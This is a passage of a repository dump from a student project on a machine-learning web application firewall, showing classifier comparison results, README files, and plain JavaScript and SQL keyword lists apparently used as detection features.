363 |        "      <td>0.997913</td>\n",
364 |        "      <td>[[20085, 20], [39, 1928]]</td>\n",
365 |        "      <td>{'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...</td>\n",
366 |        "    </tr>\n",
367 |        "    <tr>\n",
368 |        "      <th>count 2grams Logistic</th>\n",
369 |        "      <td>0.997871</td>\n",
370 |        "      <td>0.979664</td>\n",
371 |        "      <td>0.999652</td>\n",
372 |        "      <td>0.998061</td>\n",
373 |        "      <td>[[20098, 7], [40, 1927]]</td>\n",
374 |        "      <td>{'clf__C': 10, 'vect__min_df': 20}</td>\n",
375 |        "    </tr>\n",
376 |        "    <tr>\n",
377 |        "      <th>count 2grams SVM</th>\n",
378 |        "      <td>0.997735</td>\n",
379 |        "      <td>0.979156</td>\n",
380 |        "      <td>0.999552</td>\n",
381 |        "      <td>0.99862</td>\n",
382 |        "      <td>[[20096, 9], [41, 1926]]</td>\n",
383 |        "      <td>{'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...</td>\n",
384 |        "    </tr>\n",
385 |        "    <tr>\n",
386 |        "      <th>custom RandomForest</th>\n",
387 |        "      <td>0.996874</td>\n",
388 |        "      <td>0.978139</td>\n",
389 |        "      <td>0.998707</td>\n",
390 |        "      <td>0.998571</td>\n",
391 |        "      <td>[[20079, 26], [43, 1924]]</td>\n",
392 |        "      <td>{'n_estimators': 40}</td>\n",
393 |        "    </tr>\n",
394 |        "    <tr>\n",
395 |        "      <th>count 2grams MultinomialNB</th>\n",
396 |        "      <td>0.99411</td>\n",
397 |        "      <td>0.978139</td>\n",
398 |        "      <td>0.995673</td>\n",
399 |        "      <td>0.989279</td>\n",
400 |        "      <td>[[20018, 87], [43, 1924]]</td>\n",
401 |        "      <td>{'vect__min_df': 1}</td>\n",
402 |        "    </tr>\n",
403 |        "    <tr>\n",
404 |        "      <th>tfidf 3grams Logistic</th>\n",
405 |        "      <td>0.997735</td>\n",
406 |        "      <td>0.977631</td>\n",
407 |        "      <td>0.999702</td>\n",
408 |        "      <td>0.999575</td>\n",
409 |        "      <td>[[20099, 6], [44, 1923]]</td>\n",
410 |        "      <td>{'clf__C': 1000, 'vect__min_df': 1}</td>\n",
411 |        "    </tr>\n",
412 |        "    <tr>\n",
413 |        "      <th>tfidf 3grams MultinomialNB</th>\n",
414 |        "      <td>0.996058</td>\n",
415 |        "      <td>0.976614</td>\n",
416 |        "      <td>0.997961</td>\n",
417 |        "      <td>0.999112</td>\n",
418 |        "      <td>[[20064, 41], [46, 1921]]</td>\n",
419 |        "      <td>{'vect__min_df': 2}</td>\n",
420 |        "    </tr>\n",
421 |        "    <tr>\n",
422 |        "      <th>tfidf 3grams RandomForest</th>\n",
423 |        "      <td>0.997553</td>\n",
424 |        "      <td>0.975089</td>\n",
425 |        "      <td>0.999751</td>\n",
426 |        "      <td>0.999082</td>\n",
427 |        "      <td>[[20100, 5], [49, 1918]]</td>\n",
428 |        "      <td>{'vect__min_df': 5, 'clf__n_estimators': 60}</td>\n",
429 |        "    </tr>\n",
430 |        "    <tr>\n",
431 |        "      <th>count 3grams RandomForest</th>\n",
432 |        "      <td>0.997191</td>\n",
433 |        "      <td>0.972039</td>\n",
434 |        "      <td>0.999652</td>\n",
435 |        "      <td>0.99907</td>\n",
436 |        "      <td>[[20098, 7], [55, 1912]]</td>\n",
437 |        "      <td>{'vect__min_df': 5, 'clf__n_estimators': 60}</td>\n",
438 |        "    </tr>\n",
439 |        "    <tr>\n",
440 |        "      <th>count 3grams Logistic</th>\n",
441 |        "      <td>0.997146</td>\n",
442 |        "      <td>0.970513</td>\n",
443 |        "      <td>0.999751</td>\n",
444 |        "      <td>0.9981</td>\n",
445 |        "      <td>[[20100, 5], [58, 1909]]</td>\n",
446 |        "      <td>{'clf__C': 10, 'vect__min_df': 2}</td>\n",
447 |        "    </tr>\n",
448 |        "    <tr>\n",
449 |        "      <th>count 3grams SVM</th>\n",
450 |        "      <td>0.996693</td>\n",
451 |        "      <td>0.968988</td>\n",
452 |        "      <td>0.999403</td>\n",
453 |        "      <td>0.997568</td>\n",
454 |        "      <td>[[20093, 12], [61, 1906]]</td>\n",
455 |        "      <td>{'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...</td>\n",
456 |        "    </tr>\n",
457 |        "    <tr>\n",
458 |        "      <th>tfidf 2grams MultinomialNB</th>\n",
459 |        "      <td>0.995651</td>\n",
460 |        "      <td>0.968988</td>\n",
461 |        "      <td>0.998259</td>\n",
462 |        "      <td>0.99798</td>\n",
463 |        "      <td>[[20070, 35], [61, 1906]]</td>\n",
464 |        "      <td>{'vect__min_df': 2}</td>\n",
465 |        "    </tr>\n",
466 |        "    <tr>\n",
467 |        "      <th>tfidf 2grams SVM</th>\n",
468 |        "      <td>0.996693</td>\n",
469 |        "      <td>0.967463</td>\n",
470 |        "      <td>0.999552</td>\n",
471 |        "      <td>0.99909</td>\n",
472 |        "      <td>[[20096, 9], [64, 1903]]</td>\n",
473 |        "      <td>{'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...</td>\n",
474 |        "    </tr>\n",
475 |        "    <tr>\n",
476 |        "      <th>tfidf 1grams Logistic</th>\n",
477 |        "      <td>0.996104</td>\n",
478 |        "      <td>0.967463</td>\n",
479 |        "      <td>0.998906</td>\n",
480 |        "      <td>0.998022</td>\n",
481 |        "      <td>[[20083, 22], [64, 1903]]</td>\n",
482 |        "      <td>{'clf__C': 1000, 'vect__min_df': 1}</td>\n",
483 |        "    </tr>\n",
484 |        "    <tr>\n",
485 |        "      <th>count 1grams Logistic</th>\n",
486 |        "      <td>0.996375</td>\n",
487 |        "      <td>0.963396</td>\n",
488 |        "      <td>0.999602</td>\n",
489 |        "      <td>0.996902</td>\n",
490 |        "      <td>[[20097, 8], [72, 1895]]</td>\n",
491 |        "      <td>{'clf__C': 10, 'vect__min_df': 40}</td>\n",
492 |        "    </tr>\n",
493 |        "    <tr>\n",
494 |        "      <th>count 1grams MultinomialNB</th>\n",
495 |        "      <td>0.990939</td>\n",
496 |        "      <td>0.962379</td>\n",
497 |        "      <td>0.993733</td>\n",
498 |        "      <td>0.976337</td>\n",
499 |        "      <td>[[19979, 126], [74, 1893]]</td>\n",
500 |        "      <td>{'vect__min_df': 20}</td>\n",
501 |        "    </tr>\n",
502 |        "    <tr>\n",
503 |        "      <th>custom MLPClassifier</th>\n",
504 |        "      <td>0.992796</td>\n",
505 |        "      <td>0.954753</td>\n",
506 |        "      <td>0.996518</td>\n",
507 |        "      <td>0.997632</td>\n",
508 |        "      <td>[[20035, 70], [89, 1878]]</td>\n",
509 |        "      <td>{'learning_rate': 'invscaling', 'learning_rate...</td>\n",
510 |        "    </tr>\n",
511 |        "    <tr>\n",
512 |        "      <th>tfidf 1grams SVM</th>\n",
513 |        "      <td>0.994246</td>\n",
514 |        "      <td>0.949161</td>\n",
515 |        "      <td>0.998657</td>\n",
516 |        "      <td>0.996409</td>\n",
517 |        "      <td>[[20078, 27], [100, 1867]]</td>\n",
518 |        "      <td>{'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...</td>\n",
519 |        "    </tr>\n",
520 |        "    <tr>\n",
521 |        "      <th>tfidf 3grams SVM</th>\n",
522 |        "      <td>0.994971</td>\n",
523 |        "      <td>0.947128</td>\n",
524 |        "      <td>0.999652</td>\n",
525 |        "      <td>0.998131</td>\n",
526 |        "      <td>[[20098, 7], [104, 1863]]</td>\n",
527 |        "      <td>{'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...</td>\n",
528 |        "    </tr>\n",
529 |        "    <tr>\n",
530 |        "      <th>custom AdaBoostClassifier</th>\n",
531 |        "      <td>0.98967</td>\n",
532 |        "      <td>0.930351</td>\n",
533 |        "      <td>0.995474</td>\n",
534 |        "      <td>0.997814</td>\n",
535 |        "      <td>[[20014, 91], [137, 1830]]</td>\n",
536 |        "      <td>{'learning_rate': 1.0, 'n_estimators': 100}</td>\n",
537 |        "    </tr>\n",
538 |        "    <tr>\n",
539 |        "      <th>tfidf 1grams MultinomialNB</th>\n",
540 |        "      <td>0.991075</td>\n",
541 |        "      <td>0.9273</td>\n",
542 |        "      <td>0.997314</td>\n",
543 |        "      <td>0.99267</td>\n",
544 |        "      <td>[[20051, 54], [143, 1824]]</td>\n",
545 |        "      <td>{'vect__min_df': 1}</td>\n",
546 |        "    </tr>\n",
547 |        "    <tr>\n",
548 |        "      <th>custom MultinomialNB</th>\n",
549 |        "      <td>0.924339</td>\n",
550 |        "      <td>0.916116</td>\n",
551 |        "      <td>0.925143</td>\n",
552 |        "      <td>0.971266</td>\n",
553 |        "      <td>[[18600, 1505], [165, 1802]]</td>\n",
554 |        "      <td>{'alpha': 1.0}</td>\n",
555 |        "    </tr>\n",
556 |        "    <tr>\n",
557 |        "      <th>custom DecisionTree</th>\n",
558 |        "      <td>0.9889</td>\n",
559 |        "      <td>0.89578</td>\n",
560 |        "      <td>0.99801</td>\n",
561 |        "      <td>0.990906</td>\n",
562 |        "      <td>[[20065, 40], [205, 1762]]</td>\n",
563 |        "      <td>{'min_samples_split': 2}</td>\n",
564 |        "    </tr>\n",
565 |        "    <tr>\n",
566 |        "      <th>custom SGD</th>\n",
567 |        "      <td>0.981606</td>\n",
568 |        "      <td>0.877478</td>\n",
569 |        "      <td>0.991793</td>\n",
570 |        "      <td>0.984595</td>\n",
571 |        "      <td>[[19940, 165], [241, 1726]]</td>\n",
572 |        "      <td>{'learning_rate': 'optimal'}</td>\n",
573 |        "    </tr>\n",
574 |        "    <tr>\n",
575 |        "      <th>custom Logistic</th>\n",
576 |        "      <td>0.98446</td>\n",
577 |        "      <td>0.862227</td>\n",
578 |        "      <td>0.996419</td>\n",
579 |        "      <td>0.990221</td>\n",
580 |        "      <td>[[20033, 72], [271, 1696]]</td>\n",
581 |        "      <td>{'C': 100}</td>\n",
582 |        "    </tr>\n",
583 |        "  </tbody>\n",
584 |        "</table>\n",
585 |        "</div>"
586 |       ],
587 |       "text/plain": [
588 |        "                            accuracy sensitivity specificity       auc  \\\n",
589 |        "tfidf 1grams RandomForest   0.998324    0.992883    0.998856  0.999167   \n",
590 |        "count 1grams RandomForest   0.998414    0.989832    0.999254  0.999426   \n",
591 |        "tfidf 2grams RandomForest   0.998596    0.988307    0.999602  0.999375   \n",
592 |        "count 2grams RandomForest   0.998414    0.988307    0.999403   0.99912   \n",
593 |        "tfidf 2grams Logistic       0.998142    0.985257    0.999403  0.999489   \n",
594 |        "custom SVM                   0.99411    0.985257    0.994976  0.997742   \n",
595 |        "count 3grams MultinomialNB  0.993567    0.981698    0.994728  0.997707   \n",
596 |        "count 1grams SVM            0.997327    0.980173    0.999005  0.997913   \n",
597 |        "count 2grams Logistic       0.997871    0.979664    0.999652  0.998061   \n",
598 |        "count 2grams SVM            0.997735    0.979156    0.999552   0.99862   \n",
599 |        "custom RandomForest         0.996874    0.978139    0.998707  0.998571   \n",
600 |        "count 2grams MultinomialNB   0.99411    0.978139    0.995673  0.989279   \n",
601 |        "tfidf 3grams Logistic       0.997735    0.977631    0.999702  0.999575   \n",
602 |        "tfidf 3grams MultinomialNB  0.996058    0.976614    0.997961  0.999112   \n",
603 |        "tfidf 3grams RandomForest   0.997553    0.975089    0.999751  0.999082   \n",
604 |        "count 3grams RandomForest   0.997191    0.972039    0.999652   0.99907   \n",
605 |        "count 3grams Logistic       0.997146    0.970513    0.999751    0.9981   \n",
606 |        "count 3grams SVM            0.996693    0.968988    0.999403  0.997568   \n",
607 |        "tfidf 2grams MultinomialNB  0.995651    0.968988    0.998259   0.99798   \n",
608 |        "tfidf 2grams SVM            0.996693    0.967463    0.999552   0.99909   \n",
609 |        "tfidf 1grams Logistic       0.996104    0.967463    0.998906  0.998022   \n",
610 |        "count 1grams Logistic       0.996375    0.963396    0.999602  0.996902   \n",
611 |        "count 1grams MultinomialNB  0.990939    0.962379    0.993733  0.976337   \n",
612 |        "custom MLPClassifier        0.992796    0.954753    0.996518  0.997632   \n",
613 |        "tfidf 1grams SVM            0.994246    0.949161    0.998657  0.996409   \n",
614 |        "tfidf 3grams SVM            0.994971    0.947128    0.999652  0.998131   \n",
615 |        "custom AdaBoostClassifier    0.98967    0.930351    0.995474  0.997814   \n",
616 |        "tfidf 1grams MultinomialNB  0.991075      0.9273    0.997314   0.99267   \n",
617 |        "custom MultinomialNB        0.924339    0.916116    0.925143  0.971266   \n",
618 |        "custom DecisionTree           0.9889     0.89578     0.99801  0.990906   \n",
619 |        "custom SGD                  0.981606    0.877478    0.991793  0.984595   \n",
620 |        "custom Logistic              0.98446    0.862227    0.996419  0.990221   \n",
621 |        "\n",
622 |        "                                             conf_matrix  \\\n",
623 |        "tfidf 1grams RandomForest      [[20082, 23], [14, 1953]]   \n",
624 |        "count 1grams RandomForest      [[20090, 15], [20, 1947]]   \n",
625 |        "tfidf 2grams RandomForest       [[20097, 8], [23, 1944]]   \n",
626 |        "count 2grams RandomForest      [[20093, 12], [23, 1944]]   \n",
627 |        "tfidf 2grams Logistic          [[20093, 12], [29, 1938]]   \n",
628 |        "custom SVM                    [[20004, 101], [29, 1938]]   \n",
629 |        "count 3grams MultinomialNB    [[19999, 106], [36, 1931]]   \n",
630 |        "count 1grams SVM               [[20085, 20], [39, 1928]]   \n",
631 |        "count 2grams Logistic           [[20098, 7], [40, 1927]]   \n",
632 |        "count 2grams SVM                [[20096, 9], [41, 1926]]   \n",
633 |        "custom RandomForest            [[20079, 26], [43, 1924]]   \n",
634 |        "count 2grams MultinomialNB     [[20018, 87], [43, 1924]]   \n",
635 |        "tfidf 3grams Logistic           [[20099, 6], [44, 1923]]   \n",
636 |        "tfidf 3grams MultinomialNB     [[20064, 41], [46, 1921]]   \n",
637 |        "tfidf 3grams RandomForest       [[20100, 5], [49, 1918]]   \n",
638 |        "count 3grams RandomForest       [[20098, 7], [55, 1912]]   \n",
639 |        "count 3grams Logistic           [[20100, 5], [58, 1909]]   \n",
640 |        "count 3grams SVM               [[20093, 12], [61, 1906]]   \n",
641 |        "tfidf 2grams MultinomialNB     [[20070, 35], [61, 1906]]   \n",
642 |        "tfidf 2grams SVM                [[20096, 9], [64, 1903]]   \n",
643 |        "tfidf 1grams Logistic          [[20083, 22], [64, 1903]]   \n",
644 |        "count 1grams Logistic           [[20097, 8], [72, 1895]]   \n",
645 |        "count 1grams MultinomialNB    [[19979, 126], [74, 1893]]   \n",
646 |        "custom MLPClassifier           [[20035, 70], [89, 1878]]   \n",
647 |        "tfidf 1grams SVM              [[20078, 27], [100, 1867]]   \n",
648 |        "tfidf 3grams SVM               [[20098, 7], [104, 1863]]   \n",
649 |        "custom AdaBoostClassifier     [[20014, 91], [137, 1830]]   \n",
650 |        "tfidf 1grams MultinomialNB    [[20051, 54], [143, 1824]]   \n",
651 |        "custom MultinomialNB        [[18600, 1505], [165, 1802]]   \n",
652 |        "custom DecisionTree           [[20065, 40], [205, 1762]]   \n",
653 |        "custom SGD                   [[19940, 165], [241, 1726]]   \n",
654 |        "custom Logistic               [[20033, 72], [271, 1696]]   \n",
655 |        "\n",
656 |        "                                                                       params  \n",
657 |        "tfidf 1grams RandomForest       {'vect__min_df': 40, 'clf__n_estimators': 60}  \n",
658 |        "count 1grams RandomForest        {'vect__min_df': 1, 'clf__n_estimators': 60}  \n",
659 |        "tfidf 2grams RandomForest        {'vect__min_df': 5, 'clf__n_estimators': 60}  \n",
660 |        "count 2grams RandomForest        {'vect__min_df': 1, 'clf__n_estimators': 60}  \n",
661 |        "tfidf 2grams Logistic                     {'clf__C': 1000, 'vect__min_df': 1}  \n",
662 |        "custom SVM                       {'C': 100, 'gamma': 'auto', 'kernel': 'rbf'}  \n",
663 |        "count 3grams MultinomialNB                                {'vect__min_df': 1}  \n",
664 |        "count 1grams SVM            {'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...  \n",
665 |        "count 2grams Logistic                      {'clf__C': 10, 'vect__min_df': 20}  \n",
666 |        "count 2grams SVM            {'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...  \n",
667 |        "custom RandomForest                                      {'n_estimators': 40}  \n",
668 |        "count 2grams MultinomialNB                                {'vect__min_df': 1}  \n",
669 |        "tfidf 3grams Logistic                     {'clf__C': 1000, 'vect__min_df': 1}  \n",
670 |        "tfidf 3grams MultinomialNB                                {'vect__min_df': 2}  \n",
671 |        "tfidf 3grams RandomForest        {'vect__min_df': 5, 'clf__n_estimators': 60}  \n",
672 |        "count 3grams RandomForest        {'vect__min_df': 5, 'clf__n_estimators': 60}  \n",
673 |        "count 3grams Logistic                       {'clf__C': 10, 'vect__min_df': 2}  \n",
674 |        "count 3grams SVM            {'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...  \n",
675 |        "tfidf 2grams MultinomialNB                                {'vect__min_df': 2}  \n",
676 |        "tfidf 2grams SVM            {'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...  \n",
677 |        "tfidf 1grams Logistic                     {'clf__C': 1000, 'vect__min_df': 1}  \n",
678 |        "count 1grams Logistic                      {'clf__C': 10, 'vect__min_df': 40}  \n",
679 |        "count 1grams MultinomialNB                               {'vect__min_df': 20}  \n",
680 |        "custom MLPClassifier        {'learning_rate': 'invscaling', 'learning_rate...  \n",
681 |        "tfidf 1grams SVM            {'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...  \n",
682 |        "tfidf 3grams SVM            {'clf__C': 100, 'clf__kernel': 'rbf', 'vect__m...  \n",
683 |        "custom AdaBoostClassifier         {'learning_rate': 1.0, 'n_estimators': 100}  \n",
684 |        "tfidf 1grams MultinomialNB                                {'vect__min_df': 1}  \n",
685 |        "custom MultinomialNB                                           {'alpha': 1.0}  \n",
686 |        "custom DecisionTree                                  {'min_samples_split': 2}  \n",
687 |        "custom SGD                                       {'learning_rate': 'optimal'}  \n",
688 |        "custom Logistic                                                    {'C': 100}  "
689 |       ]
690 |      },
691 |      "metadata": {},
692 |      "output_type": "display_data"
693 |     }
694 |    ],
695 |    "source": [
696 |     "from IPython.display import display\n",
697 |     "import pandas as pd\n",
698 |     "display(classifierz)\n",
699 |     "classifierz.to_csv('data/classifiers_result_table.csv',encoding='UTF-8')"
700 |    ]
701 |   }
702 |  ],
703 |  "metadata": {
704 |   "kernelspec": {
705 |    "display_name": "Python 3",
706 |    "language": "python",
707 |    "name": "python3"
708 |   },
709 |   "language_info": {
710 |    "codemirror_mode": {
711 |     "name": "ipython",
712 |     "version": 3
713 |    },
714 |    "file_extension": ".py",
715 |    "mimetype": "text/x-python",
716 |    "name": "python",
717 |    "nbconvert_exporter": "python",
718 |    "pygments_lexer": "ipython3",
719 |    "version": "3.5.3"
720 |   }
721 |  },
722 |  "nbformat": 4,
723 |  "nbformat_minor": 2
724 | }
725 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Machine learning based web application firewall
 2 | 
 3 | Machine learning based Web Application firewall for detection attacks such as SQL injections, XSS and shell script injections. 
 4 | 
 5 | Course project for TDA602
 6 | Contributors: Filip Granqvist & Oskar Holmberg
 7 | 
 8 | Requirements:
 9 |  - Python 3.x
10 |  - Jupyter notebook
11 |  - Python libraries
12 |    * Pandas
13 |    * Numpy
14 |    * Sklearn
15 |    * matplotlib
16 |    * seaborn
17 |    * scipy
18 |  - Node.js (to run demo server)
19 | 
20 | Follow along our development process in these notebooks:
21 |  - 0_Data_wrangling.ipynb	(Formating other sources of payload datasets into a common format (don't step through this))
22 |  - 1_Data_cleaning.ipynb	(Cleaning the data and output into a common .csv file)
23 |  - 2_Data_analysis.ipynb (All analysis, training, evaluation and saving models to pickles (not recommended to step through the training section, takes a long time))
24 |  
25 |  To run notebooks (they can also be read from github):
26 |  1. Install jupyter notebook
27 |  2. type in cmd: jupyter notebook <notebookfile.ipynb>
28 |  3. step through each part of the notebook using Ctrl+Enter or from the toolbar
29 |  
30 |  
31 |  Plots_technical_background.ipynb contains junk used to create images for the report  
32 |    
33 |  Demo-server contains a Node.js server with our best classifier (in the form of a .pickle) implemented available for live testing  
34 |  See README.md in demo-server for instructions on how to set up the server  
35 |    
36 |  images contains images used for the report
37 |  
38 |  data folder contains our malicious and non-malicious data. Also contains trained classifiers in form of .pickle files  
39 |  tfidf_2grams_randomforest.p contains our single best classifier  
40 |  trained_classifiers.p contains all our classifiers along with performance metrics. But this is not the final version, it was too big for github. Download the final version from here: https://1drv.ms/f/s!Aj1zBHCOJiQFgbQwDswBYtpzB1Pulg and replace the old one
41 | 


--------------------------------------------------------------------------------
/data/JavascriptKeywords.txt:
--------------------------------------------------------------------------------
  1 | Keyword
  2 | abstract
  3 | arguments
  4 | await*
  5 | boolean
  6 | break
  7 | byte
  8 | case
  9 | catch
 10 | charclass*
 11 | const
 12 | continue
 13 | debugger
 14 | default
 15 | delete
 16 | do
 17 | double
 18 | else
 19 | enum*
 20 | eval
 21 | export*
 22 | extends*
 23 | false
 24 | final
 25 | finally
 26 | float
 27 | for
 28 | function
 29 | goto
 30 | if
 31 | implements
 32 | import*
 33 | in
 34 | instanceof
 35 | int
 36 | interface
 37 | let*
 38 | long
 39 | native
 40 | new
 41 | null
 42 | package
 43 | private
 44 | protected
 45 | public
 46 | return
 47 | short
 48 | static
 49 | super*
 50 | switch
 51 | synchronized
 52 | this
 53 | throw
 54 | throws
 55 | transient
 56 | true
 57 | try
 58 | typeof
 59 | var
 60 | void
 61 | volatile
 62 | while
 63 | with
 64 | yield
 65 | alert
 66 | all
 67 | anchor
 68 | anchors
 69 | area
 70 | assign
 71 | blur
 72 | button
 73 | checkbox
 74 | clearInterval
 75 | clearTimeout
 76 | clientInformation
 77 | close
 78 | closed
 79 | confirm
 80 | constructor
 81 | crypto
 82 | decodeURI
 83 | decodeURIComponent
 84 | defaultStatus
 85 | document
 86 | element
 87 | elements
 88 | embed
 89 | embeds
 90 | encodeURI
 91 | encodeURIComponent
 92 | escape
 93 | event
 94 | fileUpload
 95 | focus
 96 | form
 97 | forms
 98 | frame
 99 | innerHeight
100 | innerWidth
101 | layer
102 | layers
103 | link
104 | location
105 | mimeTypes
106 | navigate
107 | navigator
108 | frames
109 | frameRate
110 | hidden
111 | history
112 | image
113 | images
114 | offscreenBuffering
115 | open
116 | opener
117 | option
118 | outerHeight
119 | outerWidth
120 | packages
121 | pageXOffset
122 | pageYOffset
123 | parent
124 | parseFloat
125 | parseInt
126 | password
127 | pkcs11
128 | plugin
129 | prompt
130 | propertyIsEnum
131 | radio
132 | reset
133 | screenX
134 | screenY
135 | scroll
136 | secure
137 | select
138 | self
139 | setInterval
140 | setTimeout
141 | status
142 | submit
143 | taint
144 | text
145 | textarea
146 | top
147 | unescape
148 | untaint
149 | window
150 | 


--------------------------------------------------------------------------------
/data/README.md:
--------------------------------------------------------------------------------
1 | # Payload Dataset and saved classifiers (.p)
2 | 
3 | Payload types:
4 | - SQL injection
5 | - XSS
6 | - Shell script injection
7 | - non-malicious payloads
8 | 


--------------------------------------------------------------------------------
/data/SQLKeywords.txt:
--------------------------------------------------------------------------------
   1 | Keyword
   2 | 
   3 | ABORT
   4 | 
   5 | ABS
   6 | 
   7 | ABSOLUTE
   8 | 
   9 | ACCESS
  10 | 
  11 | ACTION
  12 | 
  13 | ADA
  14 | 
  15 | ADD
  16 | 
  17 | ADMIN
  18 | 
  19 | AFTER
  20 | 
  21 | AGGREGATE
  22 | 
  23 | ALIAS
  24 | 
  25 | ALL
  26 | 
  27 | ALLOCATE
  28 | 
  29 | ALSO
  30 | 
  31 | ALTER
  32 | 
  33 | ALWAYS
  34 | 
  35 | ANALYSE
  36 | 
  37 | ANALYZE
  38 | 
  39 | AND
  40 | 
  41 | ASENSITIVE
  42 | 
  43 | ASSERTION
  44 | 
  45 | ASSIGNMENT
  46 | 
  47 | ASYMMETRIC
  48 | 
  49 | ATOMIC
  50 | 
  51 | ATTRIBUTE
  52 | 
  53 | ATTRIBUTES
  54 | 
  55 | AUDIT
  56 | 
  57 | AUTHORIZATION
  58 | 
  59 | AUTO_INCREMENT
  60 | 
  61 | AVG_ROW_LENGTH
  62 | 
  63 | BACKUP
  64 | 
  65 | BACKWARD
  66 | 
  67 | BEFORE
  68 | 
  69 | BEGIN
  70 | 
  71 | BERNOULLI
  72 | 
  73 | BETWEEN
  74 | 
  75 | BIGINT
  76 | 
  77 | BINARY
  78 | 
  79 | BIT_LENGTH
  80 | 
  81 | BITVAR
  82 | 
  83 | BLOB
  84 | 
  85 | BOOL
  86 | 
  87 | BOOLEAN
  88 | 
  89 | BOTH
  90 | 
  91 | BREADTH
  92 | 
  93 | BREAK
  94 | 
  95 | BROWSE
  96 | 
  97 | BULK
  98 | 
  99 | CACHE
 100 | 
 101 | CALL
 102 | 
 103 | CALLED
 104 | 
 105 | CARDINALITY
 106 | 
 107 | CASCADE
 108 | 
 109 | CASCADED
 110 | 
 111 | CATALOG
 112 | 
 113 | CATALOG_NAME
 114 | 
 115 | CEILING
 116 | 
 117 | CHAIN
 118 | 
 119 | CHANGE
 120 | 
 121 | CHAR_LENGTH
 122 | 
 123 | CHARACTER
 124 | 
 125 | CHARACTER_LENGTH
 126 | 
 127 | CHARACTER_SET_CATALOG
 128 | 
 129 | CHARACTER_SET_NAME
 130 | 
 131 | CHARACTER_SET_SCHEMA
 132 | 
 133 | CHARACTERISTICS
 134 | 
 135 | CHARACTERS
 136 | 
 137 | CHECK
 138 | 
 139 | CHECKED
 140 | 
 141 | CHECKPOINT
 142 | 
 143 | CHECKSUM
 144 | 
 145 | CLASS
 146 | 
 147 | CLASS_ORIGIN
 148 | 
 149 | CLOSE
 150 | 
 151 | CLUSTER
 152 | 
 153 | CLUSTERED
 154 | 
 155 | COALESCE
 156 | 
 157 | COBOL
 158 | 
 159 | COLLATE
 160 | 
 161 | COLLATION
 162 | 
 163 | COLLATION_CATALOG
 164 | 
 165 | COLLATION_NAME
 166 | 
 167 | COLLATION_SCHEMA
 168 | 
 169 | COLLECT
 170 | 
 171 | COLUMN
 172 | 
 173 | COLUMN_NAME
 174 | 
 175 | COLUMNS
 176 | 
 177 | COMMAND_FUNCTION
 178 | 
 179 | COMMAND_FUNCTION_CODE
 180 | 
 181 | COMMENT
 182 | 
 183 | COMMIT
 184 | 
 185 | COMMITTED
 186 | 
 187 | COMPLETION
 188 | 
 189 | COMPRESS
 190 | 
 191 | COMPUTE
 192 | 
 193 | CONDITION
 194 | 
 195 | CONDITION_NUMBER
 196 | 
 197 | CONNECT
 198 | 
 199 | CONNECTION
 200 | 
 201 | CONNECTION_NAME
 202 | 
 203 | CONSTRAINT
 204 | 
 205 | CONSTRAINT_CATALOG
 206 | 
 207 | CONSTRAINT_NAME
 208 | 
 209 | CONSTRAINT_SCHEMA
 210 | 
 211 | CONSTRAINTS
 212 | 
 213 | CONSTRUCTOR
 214 | 
 215 | CONTAINS
 216 | 
 217 | CONTAINSTABLE
 218 | 
 219 | CONTINUE
 220 | 
 221 | CONVERSION
 222 | 
 223 | CONVERT
 224 | 
 225 | CORRESPONDING
 226 | 
 227 | COUNT
 228 | 
 229 | COVAR_POP
 230 | 
 231 | COVAR_SAMP
 232 | 
 233 | CREATE
 234 | 
 235 | CREATEDB
 236 | 
 237 | CREATEROLE
 238 | 
 239 | CREATEUSER
 240 | 
 241 | CROSS
 242 | 
 243 | CSV
 244 | 
 245 | CUBE
 246 | 
 247 | CUME_DIST
 248 | 
 249 | CURRENT
 250 | 
 251 | CURRENT_DATE
 252 | 
 253 | CURRENT_DEFAULT_TRANSFORM_GROUP
 254 | 
 255 | CURRENT_PATH
 256 | 
 257 | CURRENT_ROLE
 258 | 
 259 | CURRENT_TIME
 260 | 
 261 | CURRENT_TIMESTAMP
 262 | 
 263 | CURRENT_TRANSFORM_GROUP_FOR_TYPE
 264 | 
 265 | CURRENT_USER
 266 | 
 267 | CURSOR
 268 | 
 269 | CURSOR_NAME
 270 | 
 271 | CYCLE
 272 | 
 273 | DATABASE
 274 | 
 275 | DATABASES
 276 | 
 277 | DATETIME
 278 | 
 279 | DATETIME_INTERVAL_CODE
 280 | 
 281 | DATETIME_INTERVAL_PRECISION
 282 | 
 283 | DAY_HOUR
 284 | 
 285 | DAY_MICROSECOND
 286 | 
 287 | DAY_MINUTE
 288 | 
 289 | DAY_SECOND
 290 | 
 291 | DAYOFMONTH
 292 | 
 293 | DAYOFWEEK
 294 | 
 295 | DAYOFYEAR
 296 | 
 297 | DBCC
 298 | 
 299 | DEALLOCATE
 300 | 
 301 | DECIMAL
 302 | 
 303 | DECLARE
 304 | 
 305 | DEFAULT
 306 | 
 307 | DEFAULTS
 308 | 
 309 | DEFERRABLE
 310 | 
 311 | DEFERRED
 312 | 
 313 | DEFINED
 314 | 
 315 | DEFINER
 316 | 
 317 | DEGREE
 318 | 
 319 | DELAY_KEY_WRITE
 320 | 
 321 | DELAYED
 322 | 
 323 | DELETE
 324 | 
 325 | DELIMITER
 326 | 
 327 | DELIMITERS
 328 | 
 329 | DENSE_RANK
 330 | 
 331 | DEPTH
 332 | 
 333 | DEREF
 334 | 
 335 | DERIVED
 336 | 
 337 | DESC
 338 | 
 339 | DESCRIBE
 340 | 
 341 | DESCRIPTOR
 342 | 
 343 | DESTROY
 344 | 
 345 | DESTRUCTOR
 346 | 
 347 | DETERMINISTIC
 348 | 
 349 | DIAGNOSTICS
 350 | 
 351 | DICTIONARY
 352 | 
 353 | DISABLE
 354 | 
 355 | DISCONNECT
 356 | 
 357 | DISPATCH
 358 | 
 359 | DISTINCT
 360 | 
 361 | DISTINCTROW
 362 | 
 363 | DISTRIBUTED
 364 | 
 365 | DOMAIN
 366 | 
 367 | DOUBLE
 368 | 
 369 | DUMMY
 370 | 
 371 | DYNAMIC
 372 | 
 373 | DYNAMIC_FUNCTION
 374 | 
